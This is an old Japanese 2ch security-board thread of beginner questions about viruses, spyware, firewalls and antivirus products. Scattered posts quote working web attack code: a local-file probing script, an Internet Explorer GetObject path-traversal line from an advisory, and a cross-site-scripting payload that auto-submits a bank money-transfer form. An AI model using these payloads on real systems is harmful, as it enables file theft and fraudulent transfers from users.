MicrosoftがアホなOS作りすぎるので、アンチウイルスメーカーがそこまでする必要は
ないと思われ

↑から来ました
VirusScan ってあちこちで叩かれてるけど、漏れはここ数年問題が発生したことはない。
ちなみに NT4.0→W2K 環境。

・ウイルスバスター、ノートン＝95/98/Me用
・マカフィー＝W2K用

ってことでよろしいか？
あまりにマカフィーが叩かれてるので本当に技術的に問題ありなら
乗り換えようと思っているが単に厨房が騒いでるだけのような気もするので
誰か本当のとこ教えてください。

未だに思い出したようにRe:だけのメールが来るのが、
週末、冬休み時期、年末年始休暇、のタイミングなことが分かった。
俺のサイトも新規に見てくれる人がいるんだなあ、と素直に…
喜べないよ。

>>597
マカフィーはプリインストールが多かったし、
そんでもってアップデートでつまづくようなことをやり、
結局のところ買い直せみたいなことをやっていたんだから、
悪くいわれる要素はあると思うよ。
やっぱそういうので、企業体質とかうかがえるでしょ？
一概に「単に厨房が騒いでいるだけ」と決めつけるのも
どんなもんかと。

>>598
あ、そゆことね。
あんまり叩かれてるもんだから技術的に何か不具合があるのかと思てたよ。
アナログな要素での問題なのね。
＃まぁアップデートができない云々は技術的な不具合か。。。

別に決め付けてたわけじゃないよ。だからここで確認しようと思ったの。

webpdp_fsg_1050.exe
「webpdp_fsg_1050.exeってのがWin起動時に接続しようとするんですけど
こいつはいったい何なんでしょうか・・・」

前の書き込みにもあったけど（198)私も知りたいです。
レスには「その名前で自分のPC内検索してプロパティ見ろよ」って、
書いてありましたが、筆問の意味を理解してないみたいで、
よく分かりません。

ファイル説明は　.
正式ファイル名は　Trickler.exe
なっております。もしお分かりの方、教えてください。
一体なんなのか。

>>600
FWで警告
　　　↓
ファイルの検索
　　　↓
プロパティを見る
　　　↓
ファイルの正体がわかる
　　　↓
googleで検索
　　　↓
用語等わからなかったら自分で調べる
　　　↓
それでもわからない場合にカキコする

はい、それをして分からなかったから、書き込んでいます。
Trickler.exe
これも、すべて英語なので・・日本語では引っかからない（google)
そして、webpdp_fsg_1050.exe これも唯一日本語検索で引っかかたが、
このサイトでした？
で、書き込んだのですが。
あなたは、そういった事情を知らずにそんなこと書いてるの？
私は、このファイルの正体がしりたいだけなのです。
くだらない事は、いいのです。
まぁ、英語を読めない私が悪いのかもしれないけど。

＞英語を読めない私が悪いのかもしれないけど。
うん、お前が悪い。

>>602　何かのスパイウェアじゃないのかなぁ？

名前を変えてみて不都合が出なければ削除でいいような気がする。

うん、googleでパッと見る限り多分スパイウェア。

>>602
＞用語等わからなかったら自分で調べる
ここには辞書を引くとかも含まれるのでは？

>>602
英語が読める読めないの問題ではないと思われ。
googleですぐSpyWareって単語がでてくる。

詳しく調べたいなら外国語サイトでも
そこに登場する単語を一瞥しソフト名らしき固有名詞などを
手掛かりに更に検索する。

スパイウェアっていうもんなんですね。
ありがとうございます。

ANHTTPDでＷＥＢサーバ立てているんだけど、アクセスログを見ると
cmd.exeやroot.exeにアクセスがあるんです。
今のところ特にサーバに異状は無いようですけど、何か良い対策は
あるのでしょうか。

ウイルスバスター２００２入れたのですが、パーソナルファイヤーウォール
のログで10.64.0.1っていうIPにクローキングされっぱなしなんですが、これは
なんなのでしょうか？　

2ch型掲示板ってどれぐらい穴があるの？
ちなみにここなんだけど・・・。

2ch型マイナー掲示板「はにちゃんねる」
http://www.isn.ne.jp/~honey/hc/
アクセス数アップキャンペーン中、みんな紹介よろしこ。

質問です。

ネットに接続していない時のPCの状態は普通なのですが、
接続したとたんに、システムモニタ」の「プロセッサ使用率」
が100％に跳ね上がり、めちゃくちゃ重くなります。
これは何なんでしょうか？

少し前に、知らない人から怪しげな添付ファイル付き（本文なし）
のメールが送られてきて、即座に削除したつもりだったのですが、
その時に画面に一瞬「ファイルのダウンロード」みたいな表示が
ありました。それでウイルススキャンしてみても異常なしでした。

あと、PCを終了するときに「＊＊＊から応答がありません」等の
メッセージが出て、そのままフリーズする事もあります。
＊＊＊は一度目は「タスク何とか」、２回目は空白でした。

マシン環境
富士通FMV（win_seでﾒﾓﾘ320M)、メールソフトはWIN標準のやつ。

すみませんがよろしくお願いします。

>>612
なんかおもいっきり怪しいですね。
アンチウィルスソフトの検索エンジンやパターンファイルを更新して
再度スキャンしてみることをお勧めします。
それでも出なかったら、アンチウィルスソフトのメーカーのサイトに
ある、オンラインスキャンを試してみましょう。
こちらのほうが検出率は高そうです。

>612
窓の手でも使って自動実行してるやつを外してみ
se（98だよな？）って稼働してるプロセスとか見れたっけ？
W2Kタスクマネージャーならバックグラウンドで悪さしてるソフト探しやすいんだが

本文の無いのはどのウイルスだっけ？
BADTRANS.B？

>>613
試してみます。

>>614
98SEです。
窓の手ってなんですか？

使ってるメーラーの名前知らん奴が
窓の手知ってる訳ないわな（ｗ

>>617
すんません。Outlook Expressです。

>>618
素直だな。気に入ったよ（ｗ

ここ逝ってみ。
http://www.asahi-net.or.jp/~vr4m-ikw/

>>613 >>614
>>615 >>617,619

おかげさまで、どうやらウイルス駆除できました。たぶん。
ﾔﾊﾟｰﾘ>>615さんの言ってたBADTRANS.Bっていう奴みたいです。
ありがとうございました。

年末　質問増加aqge

今日　わかったこと
ノートン利用者には厨房が多い

>>622
ノートンに限ったことじゃないよ。

>623
ん？
ワクチンソフト使ってる人は厨房ばかり？
セキュリティの意味も知らずPCいぢってるオヤジたちよりマシじゃん

　# ピーコ天国＆セキュリティ無法のCHINA管理IPからは
いまだにCodeRedからの突っつきがあるのう

>>624
コリアモナー

んもーなんで今頃サーカムなんか来るかなあ．．．

>>612のところだけ時代が10年・・・

単発質問新規スレが最近増えてきてるからage

チャットをやってて、ＩＰを抜かれました。
なんかＹＢＢとかいってました。
それで、なんかお気に入りＹは２ちゃんで書いた場所がばれました。
おそらく相手は私のパソコンに入ったとおもわれますが、一体どうしてでしょう。
今、脅されてます。それに、なんかＩＰが
ばれると、ネットでの買い物がまずいとかどうとか、
対策教えてください。

>>629はマルチにつき放置せよ

ageとくね

ひとつ教えていただきたいことが。
ウィルスバスター2002のパーソナルファイアウォールの設定にある
「信頼するコンピュータ」に自分のPCのLANアダプタが表示されるんだけど
これは信頼するコンピューターに追加しちゃっていいの？

当方のパソコン環境
WinXP　ADSLにて接続　使用ルーターはMegaBit Gear

Q313675　を導入する。最終的にはIEの累積修正も
含まれている、これ１つでいい。

>>632
http://pc.2ch.net/test/read.cgi/sec/1009212569/l50
このスレでは解決しているように見えるのだが。

>>632
おれだったらおまえのは登録しない。

Norton AntiVirus Enterprise Solution 4.6 って奴の新品が手元にあります。
でもってWindows98とかMeとかのPCがありますが、LAN上にNTやW2Kはいません。
このW98やMeを上記のソフトでウィルス対策することは可能でしょうか？
管理サーバは必須なんでしょうか？

ついに初質スレに抜かれたね

どーでもいいことだけど

なんか単発質問スレ立てた馬鹿が
向こうで騒いでるみたいね

F-Secureってどう？かなーりスキャンが遅いけど。

メールにファイル添付って　どうやるんですか？

>>640
ネタかよ。
ここがどんな板のどんなスレか知ってて聞いてるのか？

>>641
安心してMXしたい輩が立ち寄る板（失笑

通信技術板でRFC（STD）を目指すプロジェクトがスタートしました。
セキュリティ板の住人のお力添えも頂ければありがたいです。
http://pc.2ch.net/test/read.cgi/network/1010255621/

はじめましてです。
２ちゃんで使える串晒せや！ｺﾞﾙｧ！
厨房だとか基地外だとか、外出だとか言うんじゃﾈｪ。
おねがいします。

ttp://www.zero-zone.net/
2chなら知ってる人いると思うけど相当変わったよ。
ココ
セキュリティバリバリかけてるとか書いてるけど
かけてるのは零ではなかろうか・・・ｗ

>>644　マルチは、、、(･∀･)ｲｯﾃﾖｼ!!

SOCKS5のダウンロード手順ってどうなってるんでしょうか？
自動返信にある"Please reply"ってそのまま返信すればいいの？

質問です。最近、添付ファイル有りの宛先も差出人もないメールや
メールを出していないのにそのメールアドレスは存在しないとのメール
が返ってきたりしています。もしかしてウィルスが悪戯しているのでしょうか？
誰か教えてください。

自宅鯖でうｐロダ運営している人いる？

いたら運用上の問題点とか話し合いたいな．そういうスレない
みたいだし・・・

>>648
悪戯しているんじゃなくて、活動しているのです。

>>650
素敵な回答ですね（ｗ

>>648
即座に回線切ってご自分のマシンをキレイにしましょうね。
「どうやってキレイにするんですか？」みたいな質問はしないでネ。

たまにさあ、
チャイナテレコム系の全てのアドレスをブロックしたくなる時ってない？

>648
ネタならｺﾞﾙｧ
マジレスならかわいそうなのでお教えいたします

受信している怪しいメール、それは多分ウイルス付きのメールでしょう
本文・添付ファイル共に絶対に開けないでください（プレビューしてもだめ）
そのかわり、メールのプロパティ
（受信トレイで該当メール選択→ファイル→プロパティ）
を開いて差出人のアドレスを確認してみて下さい（全般タブのところでよい）
そのアドレスが知人からの場合は
その知人に怪しいメール送信の件を忠告しなければなりません
また自分のPCから自分のPCに送信している場合もあります
送信済みトレイをみて
覚えの無い送信済みメールがあるかないか確認して下さい
あった場合あなたのPCは間違いなくウイルスに感染しています
勝手にメールを送信しているという点でほぼ確実です
ウイルス検知・駆除ソフトがあればそれを使って駆除するか
無ければシマンテック、トレンドマイクロ、マカフィー等のHPをみて
対策を考えて下さい（オンラインスキャン→該当の駆除ソフトダウンロード）
まず、どのウイルスに感染したか確認、それから駆除です
最悪の場合OSの再インストールとなります
またあなたのPCから知人らに感染の輪が広まったという可能性もあるので
慎重な対応が望まれます

>>653 親切やんけｺﾞﾙｱ

ところで、初心者スレだったらそれだけでもいいのだが、
いちおう補足しとくと、感染メール送信の際に、メーラーの
送信トレイにはなんの証拠も残らないタイプのウイルスも
あるのでそれも認識しといてね。というより最近ではこのタイプ
のほうが多いから…ね。

MSがOE6にウイルス防御機能とかいってメーラーの機能を勝手に
使わせない機能をつけたからかな？ いちおうメーラー機能使う
タイプのウイルスは、これで防御することは出来るみたい。

親切にありがとうございます。トレンドマイクロのInter Scan Outlook
でスキャンしたらWORM_HYBRIS.Bってのがみつかりました。駆除したいと
思います。

>>655
Inter Scan Outlook
そんなの持ってるなら、最初からチェックしなさいって

.NET Passport カスタマ サポート
を名乗るところからメールが来たんだけど、これってなんでしょう？

http://securitycheck.passport.com/default.asp?lc=1041
ここで、ブラウザのチェックをしろっていうんで、
行ってみたんだけど、なんのことやら、よくわかりません

MSNは使うなってことでしょうか？

メールヘッダはこんな感じ
From: "Microsoft .NET Passport" <[email protected]>
Subject: セキュリティに関する緊急情報

>セキュリティ問題の修正プログラム インストール済み
…と、出ますな。

対策未導入なら警告出るチェッカーサイトなんかな？

>>657
私のところにも同じメールが来ました。
このURLって大丈夫なんでしょうか？
過去にmsnがウィルスにやられたりしていたので
いきなりメールでこんなこと言われても開くのがｺﾜｲです。

>>657
言われるままにインストールしたけど、なにもないね

PassportユーザにIEパッチを当てるよう促すメールだそうな
http://www.zdnet.co.jp/news/0201/07/b_0106_14.html

なるほど、cookieを盗まれるやつですか
でも、うちのIE(Mac OSX)が安全かどうかわからないや

とりあえず、Passportは使わないことにします。
あと、Java scriptも切っておこう

>>649 漏れも興味あるage

yo !!

助けてください！ＢＡＤＴＲＡＮＳに感染したらしく
トレンドマイクロ社の検索ｿﾌﾄをダウンロードしてみたのですが
ウイルスが見つからなかったのです。感染していても見つからない
場合なんてあるのでしょうか？？？？くだらない質問で
すみません。。。今後どうすればいいのかさっぱり検討が
つかず困ってます・・・・・

>>665
>ＢＡＤＴＲＡＮＳに感染したらしく
…どうやって判ったのだ？

勘。

症状（メールが勝手に配信されてるとか・・・）を
プロバイダーのヘルプに聞きました。あと配信先から
返信が来て「あなたのメールはＢＡＤＴＲＡＮＳに
感染されている可能性が高いです」と教えてくれました。
トレンドマイクロ社のＨＰを教えてくれたんですが、
それ以上は教えてくれないのです・・・・・・
駆除ｿﾌﾄをすればよいのでしょうか・・・・・
もう鬱です。どなたか助けてください・・・・・

>>668

↓熟読。

コンピュータウィルス総合スレッドVol.10
http://pc.2ch.net/test/read.cgi/pcqa/1008862704/1-18

　

　　

>>669
熟読しましたが、、、すみません初心者なんで
あんまりよく分からないくて。。。
トレンドマイクロ社の検索だとウイルスが見つからなかった
んですが、自分でファイルを検索（kernel32.exe等）したら
windows内にあるっぽいのです。駆除ツールをＤＬして駆除しようと
思うのですが今までのパスワードとか全て変更しなければ
ならないのでしょうか？？？？？？すみません。本当まったく
分からないのです。。。。。。

シマンテックでスキャンしたところトロイが検出されました。
しかしトレンドマイクロでは検出されませんでした。
少し前にトロイを駆除したのですが、
NHMJJNHJにウイルスが残っていました。
これは削除しても良いファイルなのでしょうか？

検索結果
c:\WINDOWS\SYSTEM\NHMJJNHJ は 次のウィルスに感染しています： W95.Hybris.worm

つーか、ソフト買え。インストールすればもれなく駆除できる。

>>674
そうですね、大人しくソフト買います。

nimdaが欲しがっているファイルと同名の10か100メガぐらいのファイルを置いとくと
彼らは律儀にディスクへダウンロードするのでしょうか？

http://www.microsoft.com/japan/technet/security/current.asp?url=/japan/technet/security/frame_prekb.asp?sec_cd=MS01-059
このサイト開くと
ちゃんと表示されません

皆さんも以下の文が出てきますか?


Microsoft OLE DB Provider for ODBC Drivers error '80040e09'

[Microsoft][ODBC SQL Server Driver][SQL Server]SELECT permission denied on object 'JPN_Prodall', database 'Japan', owner 'dbo'.

/japan/technet/security/frame_current.asp, line 36

外出だったら申し訳ありません。教えてください。
あるサイトに行ったら、10分位の間隔でずっとpingを打たれてるのですが、
これは相手側がウィルスにやられてるとかなのでしょうか？
それとも、こちらになにかしようとしているのでしょうか？

>>676
しない

出てきます。

<html>
<head>
<script language="javascript">
<!--
var fileExists = false;
function yes()
{
alert("the file exists.");
yes = true;
}

function no()
{
if(!fileExists)
{
alert("the file does not exist.");
}
}

window.onerror = yes
window.onload = no
//-->
</script>
<script language="javascript"
src="file://c:\autoexec.bat"></script>
</head>
</html>

おちすぎ

　

http://www.watch.impress.co.jp/internet/www/article/2002/0109/flash.htm
もしこれがＵｎｉｘフラッシュに入ってたら
Ｕｎｉ板悲惨だなｗ
つぅかフラッシュにも穴かよ・・・。
だりーなぁ

>>684
やっぱ、ActionScript関係ありかなぁ・・・

追加・修正

IPAセキュリティセンター
http://www.ipa.go.jp/security/isg/virus.html

Symantec Security Response
http://www.symantec.com/region/jp/sarcj/

Trend Micro ウイルス情報
http://www.trendmicro.co.jp/virusinfo/index.asp

McAfee ウイルス情報
http://www.nai.com/japan/virusinfo/vinfo.asp

>>684
お礼バカが感染するだけだからUnix板は
間接的にしか被害を受けないと思われ。

今でも十分被害者だが。

ＰＣが立ち上がらなくて困っています。

最初の一度だけ立ち上がったのですが、デスクトップのショートカットが全て作動しないので
スタートボタンからネットに繋いでみようとしてみるとフリーズしました。
強制終了してもう一度立ち上げてみると、アクティブデスクトップメニューのエラーが出ました。
修復を選んでも修復されず、応答なし状態に･･･。

最近のイベントとしては
１．一月半ごろ前にトロイを発見、駆除。ダイヤルアップを書き換えるタイプです。
２．一昨日と昨日にノートン先生がポートスキャン、トロイのバックドアーへのアクセスを遮断。
３．ＩＮＳ2002で全スキャンするもウィルスは発見できず。
４．ＩＥとＯＥをやめ、ネスケとＥｕｄｏｒａをインストール。
５．添付ファイル付きなどの怪しいメールは届いてません。

昨日まで普通に使用していたのですが、今日朝立ち上げてみると冒頭のような状態になっていました。
どなたかこの状況から抜け出す方法をご存知の方いらっしゃいませんか?助けて下さい。
ＯＳ再インストールしかないのでしょうか･･･?

ちなみにＯＳはウィンドウズＭｅです（ｗ

>>691
>修復を選んでも修復されず、応答なし状態に･･･。
この修復って「システムの回復」のこと？

起動が途中で止まり、画面上部にアクティブデスクトップの修復というボタンが表示されます。
その時は背景が真っ白で、ショートカットのアイコンも飾りの無いそっけないやつで表示されてます。

>>693
トロイとかポートスキャンはよくわからないけど、
関係ないような気がします。

起動時にCtrlキーを押しっぱなしでOSのスタートメニューが
出ると思うんだけど、そこでセーフモードを選んだら、
ヘルプが出るので、そこで

「システムの回復」→適当な回復ポイントを選択

で、なんとかなりませんか？（内容的にスレ違いだけど…）

>>694
家帰ったら早速やってみます。
すばやいレスありがとうございました。

確かにウィルス関係なかったら激しくスレ違いですね（ｗ

なにはともあれ、これ読めばわかる。
なんでも書いてあった。
http://www.puchiwara.com/hacking/

フラッシュウィルスのブラウザ版が出るのは
いつくらいになると思いますか？

Microsoft Internet Explorer GetObject File Disclosure Vulnerability
BugTraq ID: 3767
リモートからの再現性: あり

公表日: Jan 01 2002 12:00A
関連するURL:
http://www.securityfocus.com/bid/3767
まとめ:

Microsoft Internet Explorer には、リモートの攻撃者が攻撃対象のコンピュー
タ内に存在する既知のファイルを、このソフトウェアの利用者が特別に組み立
てられたスクリプトを含む Web コンテンツを参照する際、閲覧できてしまう問
題が推察されている。

JScript の関数、GetObject() が ActiveX object 'htmlfile' と組み合わせて
利用される際に問題は発生する。この際、../ を含む URL が関数の最初の引数
として渡された場合、Microsoft Internet Explorer は生成された HTML 文書
オブジェクトの DOM に対し、どの様なアクセスであっても許可されてしまうの
である。

例:
a=GetObject("http://"+location.host+"/../../../../../../test.txt","htmlfile");

この問題により、悪意ある Web サイトの管理者による、攻撃対象のコンピュー
タ内に存在するいかなるファイルに対する内容の入手が可能になってしまうの
である。なお、この問題は任意のコードの実行も可能にすると推察される。

未解決！シティバンクのオンラインサイトにクロスサイトスクリプティング問題
http://www.zdnet.co.jp/enterprise/0201/09/02010913.html

https://www.c2it.com/C2IT/SendCash
<script> setTimeout("alert(document.forms[0].SRC_ACCOUNT.options[1].value)", 400); </script>
---
<script>
w=window.open("SendCash", "s","");
setTimeout("f=w.document.forms[0];f.DEST_EMAIL.value='[email protected]';
f.AMOUNT.value=10;f.submit();",15000);
setTimeout("w.document.forms[0].submit();", 15000);
</script>
---
http://www.devitry.com/c2it-security.html

>>694
Ｍｅのシステムの回復って去年の九月ごろに終わったような・・・
漏れの勘違いか？

>>700
パッチあてれば、それ以降には復元可能。

ホームアドレスが勝手に変わったんですが、どういうことでしょうか？ホームアドレスをgoogleにしてたのに、ホームアドレスが勝手に海外のエロサイトに書き換わっていました。普段、エロサイトなんか行かないし、全然覚えがありません。
どういうことでしょうか？知ってる方がいましたら、お教え下さい。すごく不安です。それから、クッキーのファイルの名前も全て、屍xxxxx.txtに変わっていました。

>>702 JS.EXCEPTIONで検索

ノートン・インターネットセキュリティ 2002にするか
ゾヌ＋ノートン・アンチウイルス 2002にするか迷ってます。
ほんとんトコどうでしょう？
使い勝手とか機能とか。

>>702
ちなみにその質問は、この板ではあまりに多くて
皆うんざりしているので、場合によっては
クソヴォケ　氏んでこい　扱いなので注意せよ

>>704
そんなの、いくらアドヴァイスしてもらっても
結局、使ってみないと分からないと思うのだが…

>>705
でも、分からないんです。これ以降くだらない質問はしないので教えてください。。。

>>703
マカフィーVirusScan（最新のウイルス定義ファイル）で検索しましたが、何も発見されませんでした。
全てのファイルを検査しました。トロイも出ませんでした。

>>706
使ってからでは遅いの。

age

>>709
どして？体験版もあるけど？

>>708
http://security1.norton.com/ssc/home.asp?j=1&langid=jp&venid=sym&plfid=20&pkj=EEVHPWFYJOKMFIDPMSV
ここでスキャンしてもなんも出んか？

>>712
分かりました。やってみますです。。。また、報告しますです。。。

これってジョークサイトらしいんですけど本当なんでしょうか？
http://www.top.or.jp/~godhand/a2.html

>>712
何もいなかったです。。。でも、web上からプライバシー（履歴）が漏れる危険があるらしいです。

>>714
だからさ。それ直リンクすると
また踏んで騒ぐ人がいるんだって。
流行らせたいの？

>>715
それなら、たぶんどっかのサイトでJavaScriptで書きかえられただけ。
設定戻して再起動して、また変更されてなければ、ＯＫ！

それから、Cookieのほうは単なるサーバー側との文字コードの違い。
Windowsのログイン名に漢字を使ってるとよくある。

>>717
本当にありがとうございました。全ての謎が解けました。
今晩はゆっくり眠れそうです。あなたは私が出会った中で一番優しい２ちゃんねらーです(^o^)。

>>718
安心するのは良いけど、念のために
「ダイヤルアップの電話番号」も確認しとけよ。

フレッツADSLなんですけど
同じISPからのIPがゾーンアラームによく引っかかるのですが
よくあることなんですか？

※　うっとうしい
不動産会社より、催促のメールが来る。鬱陶しいので、「お宅に資料請
求した覚えは無い」、しかしかくかくしかじかで刑事告発する可能性が
あるので、ログは保管しておいて下さい、旨の返信を送る。早速、とあ
る人々より具体的なアドバイスを受ける。深謝<m(__)m>。「捜索差押許
可状の発布を得ていつでもＩＳＰの捜査に着手できる」とのこと。
なんでもこういうケースでは、まずメールアドレスの「窃盗罪」が成立
するらしい。20日間ほど不自由な思いをする羽目になるかもしれないか
ら、新聞止めたり、郵便物を止めたり、レンタルしたビデオも返してお
くようにね。顧問弁護士がいるとも思えないから、地元の当番弁護士制
度も調べておいた方が良いよ。私は普段から、くだらないストーカーや
ら民事で警察を頼るな、行政コストを増やすな、その前に自分のコスト
で身を守れと主張している人間だから、心苦しい所はあるけれど。私と
しては、結構辛抱したつもりだし、２チャンで莫迦だのアホだの書かれ
る程度なら所詮はただの有名税、書かれてなんぼのものと割り切れもす
るが、同じくキーボードを叩いてやるにしても、超えちゃならん一線が
あるってことを認識できん相手には、それなりに不愉快な思いをして貰
うしかない。以降の展開に関しては、どうなっても、新聞に載るまで、
私からはもう一切公にはしない。触れない。

適宜改行されてない長文の方が鬱陶しい
そう思うのは漏れだけか？

>>722
あなただけではないでしょう。

>>711
ノートン・インターネットセキュリティ 2002って体験版ないんじゃ？

From:FunnyMoney< [email protected] >
To: [email protected]
Subject:Deposit $50.00, Play With $100.00 at Black Widow Casino
Date:***
Received:from [128.121.215.224]by pm0.com with ESMTP id ***;***
Received:(from localhost)by pm0.net (8.8.8pmg/8.8.5)id include:/usr/home/pmgs/users/funnymoney/delivery/
From [email protected]
Message-Id:< [email protected] >
X-Info: Message sent by Mindshare Design customer with ID "funnymoney"
X-Info: Report abuse to list owner at [email protected]
X-PMG-Userid: funnymoney
X-PMG-Recipient: [email protected]

To remove yourself from this mailing list, point your browser to:
http://i.pm0.net/remove?funnymoney:10

Enter your email address ( [email protected] ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney:10".
OR... Reply to this message with the word "remove" in the subject line.

Norton
InternetSecurity２００２入れたんですが、、
１、２ｃｈ（IE５，５）に書き込みできない。ブラウザが変ですよって言われちゃう
２、メディアプレイヤーがずぅーーとバッファ中で動かない
※設定は全て自動です。どうしたら解決するですか？

ガハハハ！　これ、すごいわ。
http://www.puchiwara.com/hacking/

233.204.104.203.livedoor.com
この情報でなにができますか？なにがわかりますか？

>>728
株価

>726
マルチポストは辞めなさい

>728
「livedoor.com」使っている、くらいの事。
http://www.watch.impress.co.jp/internet/www/column/hpsafety/hps6.htm

何だかしょっちゅう変なアクセスがあって
いい加減向こうのネットワーク所有者に文句言おうと思うんだけど
そのネットワーク自体がIPアドレス30個くらいの
ちっちゃなとこなんだよね。
それってひょっとして組織ぐるみでやってるって事かな?
正面からネットワーク所有者にメールで連絡したら
逆にこっちのメアドとか知られて
馬鹿見るだけなのかな?

ホームページビルダー６使ってるんだけど、

「ファイル転送」→「接続」すると
＜ﾌｧｲｱｰｳｵｰﾙ･ｻｰﾊﾞｰ　○○○○odn.ne.jpに接続できませんでした＞
って出るのよ。

何でだろう？　ﾌｧｲｱｰｳｵｰﾙのｱﾄﾞﾚｽ、ﾊﾟｽﾜｰﾄﾞが間違っているのでしょうか？

http://www.symantec.co.jp/region/jp/campaign/wstop/images/gal-back.jpg
このオネーさんってだあれ?

マジで気になります。可愛いんだけど、ﾊｧﾊｧしたい・・・

>>724
そりゃスマソ
出るまで待つか買って玉砕だな

>>728
情報管理が糞なISPなら
たくさんの情報が漏れます

さっきトロイ君が来たよって
ノートン先生に言われた
初めてだったんですんごいどきどきしてます
皆さんはこうゆうことっていっぱいあるのかな？
問題ないよね？
IPばれてるってことだよね
またなんかされないかなー
こわいよー
ノートン先生だとだめなウイルスもいいっぱいあるんだよね？

あいてってLANのアナライザ（？）を使うとわかるのかな？
フリーでもいっぱいあるんですよね？

づっと前々からなんだけど 超ド級ウザイ奴に 纏わりつかれてるんだけど。
んで、どーいう風にかっていうと、実はオイラ ポエム板の住人なんだけんど
そこでレスすると 必ず クソがかえってきます。それもオイラにの発言に
関することでのアイロニーで堂々と煽る訳でもない。煽るんなら堂々とやれと。
オイラはいろんな板の住人でもあります。そこへ まるでコバンザメの如く現れる粘着野郎。

で、質問です。2ch内でIP抜けるのは事実だろ。ならばIPを掲示板内で
検索かければ 俺の居所が解かる？つーか そんなこと可能？どうやって
やるのかを聞きたいんじゃなく 出来るのか 出来ないのか セキュ板の
勇士達よ、どうか教えて！

>>738のこれが板っす。(ある意味バカです。)
http://mentai.2ch.net/test/read.cgi/poem/1010490837/l50
の>>174から荒れております。ほとんど一人で

>736
いっぱいあるよ。
ブロックしているなら問題ないよ
IPばれている、と言うよりは、テキトーなIP にアクセスを試みているだけだよ
それがたまたま貴方のマシンだったと。
またアクセスはあると思うよ。
とりあえずブロックされているなら恐くないよ
ファイアーウォールとアンチウィルスをゴッチャにしていない？
相手のIPアドレスは、警告んところに書かれてあるでしょ、
でも判ったところで、どうしようもないから、気にしない方が良いよ。

>>740
ありがとうございます
気にしなくて良いですねよかった
いろんなこと勉強しなきゃいけないなー

>783
>2ch内でIP抜けるのは事実だろ。
フシアナさんやらなくて、ですか。無理だと思いますが。
ぱっと思いつくのは、
1.　あなたの書き込みが、どの板でも不適切なので、みんなから煽られている
　（相手は多数だけど、あなたが同一人物と勘違いしている）
2.　あなたのパソコン内に、トロイの木馬のような物が仕込まれていて、監視されている
3.　会社や大学のネットワークからのアクセスならば、その経路の途中で誰かに覗き見されている

スマソ　>738だった

>>738
その前に聞きたいのだが、君を追いかけてるらしきその粘着野郎が
特定人物だと思うのは、何か根拠があるのか？そこが知りたい。

そもそもSec版では、君がどこの誰かさっぱりわからんぞ？
>>739 のようにリンク貼りつけることではじめて
ポエム版の住人だとわかるんだが…。

>>742さん ども です！

>フシアナさんやらなくて
やってないです。

>不適切なので、みんなから煽られている
時にありかと．．．反省ｼﾙ

>トロイの木馬
ノートン2001定義等は更新済み。チェックＯＫです。

>会社や大学のネットワークからのアクセス
自宅というか事務所というか．．．です。マシンは１台

で、結論、2chでIP抜きは『不可能』ということですね。

ソネットの8Mサービスなんですが
友達のアッカからレンタルのNEC製のルータでは、デフォルトでポート80が
閉じてるんですが、家に送られてきた富士通製のルータでは開いてます。
塞ぐことはできないんでしょうか
どうか教えて下さい。宜しくお願いします。

>>744さん
ないっす。しかし かなりのバトルは やっとり ますです。
単独犯なのか複数なのかも不明です。

んーわからん．．．．(一人ごと)

飛躍しすぎかも．．．電磁波盗聴ってことは？やるとしたら金額は？
ちなみに賃貸マンション３階建て コンクリ造。(考えすぎ．．．か)

>>747
下がってるスレでﾏﾀｰﾘ話してる時に脈絡もなく煽られることある？
なかったら多分問題ないよ

>>749
うーん．．．ども です。

『電磁波盗聴』ってここで質問してもいいですか？
2chでの問題ではなく、今 この場所での問題かも。
マンションなんで 四方囲まれてる状態。その住人という説。

>>751
http://pc.2ch.net/test/read.cgi/sec/991047440/166n-

>745
744や749の言うように、
「たまたま煽りのいそうなスレで話しをしていて、複数人に煽られているのを、同一犯と思っている」
だけのように思いますが。
ウィルスチェックしても、例えば「スパイウェア」のような物は見つからないし、
「VNC」のような遠隔操作ソフトも検出されないです。
そういった物も、チェックしてみて下さい
スパイウェアはhttp://member.nifty.ne.jp/Js_KENJI/pc/ad-aware/ad-aware.htm参照
あと、IE のバージョンによっては、クッキーなどを盗めるので、セキュリティパッチを当てて置いて下さい
一応念のため。

「電磁波盗聴」の可能性は、高くないと思います。
あなたが大企業の幹部などのように「他人にとって盗聴する価値のある人物」でないなら。
またあなたが「VIP」だったとしても、盗聴の結果を「あおり」に使うのは不自然です。
もっとカネになる使い方をするでしょうから。

>>752
調べてみる。ｻﾝｸｽです！

>>753
ども！

セキュ板の勇者達へ 「ありがとーーーーーっ！！！」

SYN が来ない
なんか寂しい

セキュ板の勇者へ

ども です。
AD-Awarewでの検索結果でしたが、パッと見 以下でスパイウェアはありますか

Gator file:C:\WINDOWS\GatorPlugin.log
Timesink file:C:\WINDOWS\TSAd.dll
Timesink file:C:\WINDOWS\VcpDLL.dll
DSSAgent file:C:\WINDOWS\SYSTEM\DssAgent.exe
Doubleclick file:C:\WINDOWS\Cookies\2001@doubleclick[2].txt
Gator file:C:\WINDOWS\Downloaded Program Files\IEGator.dll
Gator file:C:\WINDOWS\Downloaded Program Files\IEGator.inf
Gator file:C:\WINDOWS\GatorPlugin.log
Timesink file:C:\WINDOWS\TSAd.dll
Timesink file:C:\WINDOWS\VcpDLL.dll

fault\software\cydoor\
Timesink key:HKEY_USERS\.default\software\timesink, inc.\
Gator key:HKEY_CLASSES_ROOT\clsid\{21ffb6c0-0da1-11d5-a9d5-00500413153c}\
Cydoor key:HKEY_CURRENT_USER\software\cydoor\
Cydoor key:HKEY_LOCAL_MACHINE\software\cydoor\
Gator key:HKEY_LOCAL_MACHINE\software\gator.com\
Gator key:HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\moduleusage\c:/windows/downloaded program files/iegator.dll\
Timesink key:HKEY_CURRENT_USER\software\timesink, inc.\
Timesink key:HKEY_LOCAL_MACHINE\software\timesink, inc.\
Web3000 key:HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\stashedgef
Web3000 key:HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\stashedgmg
DSSAgent key:Software\Microsoft\Windows\CurrentVersion\SharedDLLs\C:\WINDOWS\SYSTEM\DssAgent.exe
Gator key:Software\Microsoft\Windows\CurrentVersion\SharedDLLs\C:\WINDOWS\Downloaded Program Files\IEGator.dll

>>757
パッと見、全部でしょう

あ．そッスカ(w．．．これでスッパリ消し去ります。あんがと！！>>758

スパイブロッカー入れたらサーバー動作しようとするし、
スパイブロッカーへの外部からアクセスがあるんだけど、、、

